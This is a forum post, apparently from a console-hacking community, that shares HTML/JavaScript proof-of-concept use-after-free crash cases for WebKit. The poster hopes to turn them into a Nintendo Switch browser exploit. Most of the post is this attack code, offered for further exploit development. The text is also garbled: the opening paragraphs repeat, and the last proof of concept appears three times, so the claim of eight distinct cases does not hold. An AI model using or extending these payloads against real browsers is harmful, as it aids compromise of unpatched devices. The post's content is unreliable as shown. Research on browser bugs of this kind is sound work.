Hello GBATemp! I recently discovered a whole bunch of proof-of-concept use-after-free exploits posted by the Google Security Team that target Apple Webkit. Since they are only about a week old in terms of their publication, I figured there hasn't been a patch for them on the Switch yet. I will put those POCs down at the bottom of this post.
Now, before you start bringing the hype up, I want to remind you that these are only proof-of-concepts, and will not do anything at the moment besides maybe crashing the browser. Not all use-after-free vulnerabilities can be used to gain privileges or anything like that, and there's also ARM TrustZone that you have to worry about. However, the folks over at Google did publish a total of 8 UAF exploits within WebKit, so maybe there is hope.
Let's hope a more experienced developer will try and pick this up. I've been trying to use QEMU to emulate an aarch64 Debian distro with a Cortex-a57 CPU, but it's just too slow. So I figured the better solution was to buy a Raspberry Pi 3 and debug on that, so that should come in on Thursday.
Anyways, here is the HTML/JS for the 8 POC exploits. I hope this can become useful!
Now, before you start bringing the hype up, I want to remind you that these are only proof-of-concepts, and will not do anything at the moment besides maybe crashing the browser. Not all use-after-free vulnerabilities can be used to gain privileges or anything like that, and there's also ARM TrustZone that you have to worry about. However, the folks over at Google did publish a total of 8 UAF exploits within WebKit, so maybe there is hope.
Let's hope a more experienced developer will try and pick this up. I've been trying to use QEMU to emulate an aarch64 Debian distro with a Cortex-a57 CPU, but it's just too slow. So I figured the better solution was to buy a Raspberry Pi 3 and debug on that, so that should come in on Thursday.
Anyways, here is the HTML/JS for the 8 POC exploits. I hope this can become useful!
HTML:
<script>
function jsfuzzer() {
textarea1.setRangeText("foo");
textarea2.autofocus = true;
textarea1.name = "foo";
form.insertBefore(textarea2, form.firstChild);
form.submit();
}
function eventhandler2() {
for(var i=0;i<100;i++) {
var e = document.createElement("input");
form.appendChild(e);
}
}
</script>
<body onload=jsfuzzer()>
<form id="form" onchange="eventhandler2()">
<textarea id="textarea1">a</textarea>
<object id="object"></object>
<textarea id="textarea2">b</textarea>
HTML:
<style>
.class9 { column-span: all; }
</style>
<script>
function f() {
document.execCommand("indent", false);
var var00031 = window.getSelection().setBaseAndExtent(sum,16,null,6);
f();
}
</script>
<body onload=f()>
<pre style="column-count: 78; -webkit-user-modify: read-write">
<details>
<summary id="sum" class="class9">
<content id="htmlvar00040">
HTML:
<script>
function go() {
iframe.name = "foo";
var form = document.createElement("form");
iframe.src = "data:text/html,foo";
form.submit();
window.onbeforeunload = f;
}
function f() {
document.head.appendChild(del);
}
</script>
<body onload=go()>
<del id="del">
<iframe id="iframe"></iframe>
HTML:
<script>
function eventhandler1() {
try { txt.appendChild(kg); } catch(e) { }
}
function eventhandler2() {
try { anim.appendChild(kg); } catch(e) { }
}
function eventhandler3() {
try { table.scrollIntoView(true); } catch(e) { }
}
</script>
<table id="table"></table>
<form>
<keygen id="kg" autofocus="autofocus">
</form>
<svg>
<animate id="anim" attributeName="text-anchor" from="middle" to="inherit" onbegin="eventhandler1()" />
<text id="txt" onload="eventhandler3()">
<font color="white"></font>
<select onfocus="eventhandler2()" autofocus="autofocus">
<textarea>a</textarea>
<iframe onload="eventhandler1()"></iframe>
HTML:
<style>
#colgrp { display: table-footer-group; }
.class1 { text-transform: capitalize; display: -webkit-box; }
</style>
<script>
function go() {
textarea.setSelectionRange(30,1);
option.defaultSelected = true;
col.setAttribute("aria-labeledby", "link");
}
</script>
<body onload=go()>
<link id="link">
<table>
<colgroup id="colgrp">
<col id="col" tabindex="1"></col>
<thead class="class1">
<th class="class1">
<textarea id="textarea" readonly="readonly"></textarea>
<option id="option"></option>
HTML:
<script>
function jsfuzzer() {
circle.nearestViewportElement.innerHTML = "foo";
document.execCommand("selectAll", false);
}
function eventhandler1() {
clippath.appendChild(image);
}
function eventhandler2() {
svg.appendChild(details);
}
function eventhandler3() {
document.execCommand("fontName", false, "foo");
button.autofocus = true;
window.addEventListener("DOMNodeInserted", eventhandler2);
div.appendChild(q);
}
</script>
<body onload=jsfuzzer()>
<q id="q">
<button id="button" onfocus="eventhandler1()">b</button>
</q>
<image id="image">
<details id="details" open="true">
<keygen autofocus="autofocus">
</details>
<div id="div"></div>
<svg id="svg">
<clipPath id="clippath" onload="eventhandler3()" />
<circle id="circle" />
</svg>
</html>
HTML:
<script>
function jsfuzzer() {
circle.nearestViewportElement.innerHTML = "foo";
document.execCommand("selectAll", false);
}
function eventhandler1() {
clippath.appendChild(image);
}
function eventhandler2() {
svg.appendChild(details);
}
function eventhandler3() {
document.execCommand("fontName", false, "foo");
button.autofocus = true;
window.addEventListener("DOMNodeInserted", eventhandler2);
div.appendChild(q);
}
</script>
<body onload=jsfuzzer()>
<q id="q">
<button id="button" onfocus="eventhandler1()">b</button>
</q>
<image id="image">
<details id="details" open="true">
<keygen autofocus="autofocus">
</details>
<div id="div"></div>
<svg id="svg">
<clipPath id="clippath" onload="eventhandler3()" />
<circle id="circle" />
</svg>
</html>
HTML:
<script>
function jsfuzzer() {
circle.nearestViewportElement.innerHTML = "foo";
document.execCommand("selectAll", false);
}
function eventhandler1() {
clippath.appendChild(image);
}
function eventhandler2() {
svg.appendChild(details);
}
function eventhandler3() {
document.execCommand("fontName", false, "foo");
button.autofocus = true;
window.addEventListener("DOMNodeInserted", eventhandler2);
div.appendChild(q);
}
</script>
<body onload=jsfuzzer()>
<q id="q">
<button id="button" onfocus="eventhandler1()">b</button>
</q>
<image id="image">
<details id="details" open="true">
<keygen autofocus="autofocus">
</details>
<div id="div"></div>
<svg id="svg">
<clipPath id="clippath" onload="eventhandler3()" />
<circle id="circle" />
</svg>
</html>